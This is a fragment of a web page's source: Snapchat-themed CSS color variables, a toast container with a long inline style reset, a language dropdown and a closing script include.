--accordion-divider-border-color: #D4D5D6;
--banner-bg: transparent;
--banner-color: #000000;
--locale-dropdown-bg: #FFFFFF;
--locale-dropdown-color: #000000;
--locale-dropdown-item-color: #000000;
--locale-dropdown-item-hover-color: #000000;
}
.theme--snapchat .background--transparent-dark, .theme--snapchat.background--transparent-dark {
--globalvar-basecolor-black-bg: #000000;
--globalvar-basecolor-gray-bg: #F0F1F2;
--globalvar-basecolor-white-bg: #FFFFFF;
--globalvar-basecolor-yellow-bg: #FFFC00;
--globalvar-basecolor-transparentdark-bg: transparent;
--globalvar-basecolor-transparentlight-bg: transparent;
--button-primary-bg: #FFFC00;
--button-primary-color: #000000;
--button-secondary-bg: #FFFFFF;
--button-secondary-color: #000000;
--button-flat-bg: transparent;
--button-flat-color: #FFFFFF;
--dropdown-bg: #000000;
--dropdown-color: #D4D5D6;
--dropdown-item-color: #F7F8F9;
--dropdown-item-hover-color: #FFFFFF;
--quote-bg: #FFFFFF;
--quote-color: #000000;
--hyperlink-color: #FFFFFF;
--mosaic-bg: undefined;
--mosaic-color: #FFFFFF;
--mosaic-highlight: #FFFC00;
--mosaic-duration-bg: #FFFC00;
--mosaic-duration-color: #FFFFFF;
--mosaic-buttons-close-color: #FFFFFF;
--mosaic-buttons-close-bg: #000000;
--mosaic-buttons-close-border: #000000;
--mosaic-buttons-close-hover-color: #FFFFFF;
--mosaic-buttons-close-hover-bg: #3A3E41;
--mosaic-buttons-close-hover-border: #FFFFFF;
--mosaic-buttons-nav-color: #000000;
--mosaic-buttons-nav-bg: #FFFFFF;
--mosaic-buttons-nav-border: #FFFFFF;
--mosaic-buttons-nav-hover-color: #000000;
--mosaic-buttons-nav-hover-bg: #FFFFFF;
--mosaic-buttons-nav-hover-border: #FFFFFF;
--mosaic-buttons-filters-color: #000000;
--mosaic-buttons-filters-bg: undefined;
--mosaic-buttons-filters-active-color: #000000;
--mosaic-buttons-filters-active-bg: #FFFFFF;
--mosaic-lightbox-bg: #000000;
--mosaic-lightbox-color: #000000;
--chart-toggle-bg: undefined;
--chart-toggle-color: #FFFFFF;
--chart-toggle-buttons-large-bg: #FFFFFF;
--chart-toggle-buttons-large-color: #53575B;
--chart-toggle-buttons-large-border: #53575B;
--chart-toggle-buttons-large-active-bg: #FFFC00;
--chart-toggle-buttons-large-active-color: #000000;
--chart-toggle-buttons-large-active-border: #FFFC00;
--chart-toggle-buttons-small-bg: #FFFFFF;
--chart-toggle-buttons-small-color: #000000;
--chart-toggle-buttons-small-border: #FFFFFF;
--chart-toggle-buttons-small-active-bg: #FFFC00;
--chart-toggle-buttons-small-active-color: #000000;
--chart-toggle-buttons-small-active-border: #FFFC00;
--navigator-bg: transparent;
--navigator-color: #FFFFFF;
--navigator-item-color: #F0F1F2;
--navigator-item-hover-color: #F7F8F9;
--navigator-item-active-color: #F7F8F9;
--navigator-item-font-size: 16px;
--carousel-arrow-fill: #FFFFFF;
--content-bg: transparent;
--content-color: #FFFFFF;
--content-subtitle-color: #FFFFFF;
--content-title-color: #FFFFFF;
--block-bg: transparent;
--block-color: #FFFFFF;
--block-subtitle-color: #FFFFFF;
--block-title-color: #FFFFFF;
--block-title-font-stretch: normal;
--block-title-font-size: 48px;
--block-title-line-height: unset;
--block-title-padding-top: 0px;
--block-mobile-title-font-size: 32px;
--hero-bg: transparent;
--hero-color: #FFFFFF;
--global-header-bg: transparent;
--global-header-nav-screen-bg: #FFFFFF;
--global-header-color: #E9EAEB;
--global-header-item-color: #E9EAEB;
--global-header-item-hover-color: #FFFFFF;
--global-header-item-active-color: #FFFFFF;
--global-header-button-hover-color: #FFD301;
--icon-color: #FFFFFF;
--toggle-slider-bg: #000000;
--toggle-slider-switch: #FFFFFF;
--toggle-slider-active: #FFFC00;
--toggle-button-active-color: #000000;
--toggle-button-color: #E9EAEB;
--toggle-button-hovor-color: #C7C7CC;
--toggle-button-text-hover-color: #000000;
--toggle-button-text-item-color: #3A3E41;
--toggle-button-text-color: #000000;
--toggle-button-text-bg: #FFFFFF;
--toggle-panel-bg: #3A3E41;
--toggle-panel-color: #FFFFFF;
--footer-color: #FFFFFF;
--footer-bg: transparent;
--footer-bar-bg: transparent;
--footer-bar-divider-border-color: #53575B;
--footer-border-color: #53575B;
--footer-divider-border-color: #C7C7CC;
--accordion-color: #FFFFFF;
--accordion-body-color: #FFFFFF;
--accordion-bg: transparent;
--accordion-divider-border-color: #C7C7CC;
--banner-bg: transparent;
--banner-color: #FFFFFF;
--locale-dropdown-bg: #FFFFFF;
--locale-dropdown-color: #FFFFFF;
--locale-dropdown-item-color: #000000;
--locale-dropdown-item-hover-color: #000000;
}
</style></div></div></div></div></div><!-- End Pusher --><div id="toast-container" style="color-scheme: initial; forced-color-adjust: initial; mask: initial; math-depth: initial; position: fixed; position-anchor: initial; text-size-adjust: initial; appearance: initial; color: initial; font: initial; font-palette: initial; font-synthesis: initial; position-area: initial; text-orientation: initial; text-rendering: initial; text-spacing-trim: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; accent-color: initial; place-content: initial; align-items: flex-end; place-self: initial; alignment-baseline: initial; anchor-name: initial; anchor-scope: initial; animation-composition: initial; animation: initial; app-region: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; baseline-source: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; bottom: initial; box-decoration-break: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-block-size: initial; contain-intrinsic-size: initial; contain-intrinsic-inline-size: initial; container: initial; content: initial; content-visibility: initial; corner-shape: initial; corner-block-end-shape: initial; corner-block-start-shape: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: flex; dominant-baseline: initial; dynamic-range-limit: initial; empty-cells: initial; field-sizing: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-direction: column; flex-wrap: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: initial; hyphenate-character: initial; hyphenate-limit-chars: initial; hyphens: initial; image-orientation: initial; image-rendering: initial; initial-letter: initial; inline-size: initial; inset-block: initial; inset-inline: initial; interpolate-size: initial; isolation: initial; justify-items: initial; left: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask-type: initial; math-shift: initial; math-style: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; object-view-box: initial; offset: initial; opacity: initial; order: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-block: initial; overflow-clip-margin: initial; overflow-inline: initial; overflow-wrap: initial; overflow: initial; overlay: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position-try: initial; position-visibility: initial; print-color-adjust: initial; quotes: initial; r: initial; reading-flow: initial; reading-order: initial; resize: initial; right: 20px; rotate: initial; ruby-align: initial; ruby-position: initial; rx: initial; ry: initial; scale: initial; scroll-behavior: initial; scroll-initial-target: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-marker-group: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; scroll-timeline: initial; scrollbar-color: initial; scrollbar-gutter: initial; scrollbar-width: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-box: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-emphasis: initial; text-emphasis-position: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; text-wrap: initial; timeline-scope: initial; top: 20px; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; translate: initial; user-select: initial; vector-effect: initial; vertical-align: initial; view-timeline: initial; view-transition-class: initial; view-transition-name: initial; visibility: initial; border-spacing: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-user-drag: initial; white-space-collapse: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: 9999;"></div>
      <select data-language-changer>
        <option data-lang="en">English</option>
        <option data-lang="es">Español</option>
        <option data-lang="fr">Français</option>
      </select>
      <script src="scripts.js"></script>
      </body>
    </html>